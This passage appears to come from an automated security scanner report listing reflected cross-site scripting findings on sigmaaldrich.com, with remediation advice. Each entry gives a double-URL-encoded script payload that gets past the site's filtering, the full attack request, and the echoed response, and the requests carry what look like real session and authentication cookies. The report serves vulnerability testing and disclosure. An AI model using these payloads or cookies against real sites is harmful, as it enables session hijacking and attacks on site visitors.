Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc30a98";alert(1)//3d567e605d9/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.451. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a947e%2522%253balert%25281%2529%252f%252fe44c3cc3156 was submitted in the REST URL parameter 2. This input was echoed as a947e";alert(1)//e44c3cc3156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialiba947e%2522%253balert%25281%2529%252f%252fe44c3cc3156/sigma-aldrich/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialiba947e";alert(1)//e44c3cc3156/sigma-aldrich/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.452. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415e6%2522%253balert%25281%2529%252f%252fce7e2d95faa was submitted in the REST URL parameter 3. This input was echoed as 415e6";alert(1)//ce7e2d95faa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich415e6%2522%253balert%25281%2529%252f%252fce7e2d95faa/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich415e6";alert(1)//ce7e2d95faa/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.453. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d92ed%2522%253balert%25281%2529%252f%252fd213f7ad767 was submitted in the REST URL parameter 4. This input was echoed as d92ed";alert(1)//d213f7ad767 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/imagesd92ed%2522%253balert%25281%2529%252f%252fd213f7ad767/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:38 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/imagesd92ed";alert(1)//d213f7ad767/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.454. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a09a%2522%253balert%25281%2529%252f%252f7192f6b2c23 was submitted in the REST URL parameter 5. This input was echoed as 3a09a";alert(1)//7192f6b2c23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/news-thumbnails3a09a%2522%253balert%25281%2529%252f%252f7192f6b2c23/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:40 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/news-thumbnails3a09a";alert(1)//7192f6b2c23/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.455. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afdd%2522%253balert%25281%2529%252f%252f7f530c62bdf was submitted in the REST URL parameter 6. This input was echoed as 5afdd";alert(1)//7f530c62bdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news5afdd%2522%253balert%25281%2529%252f%252f7f530c62bdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
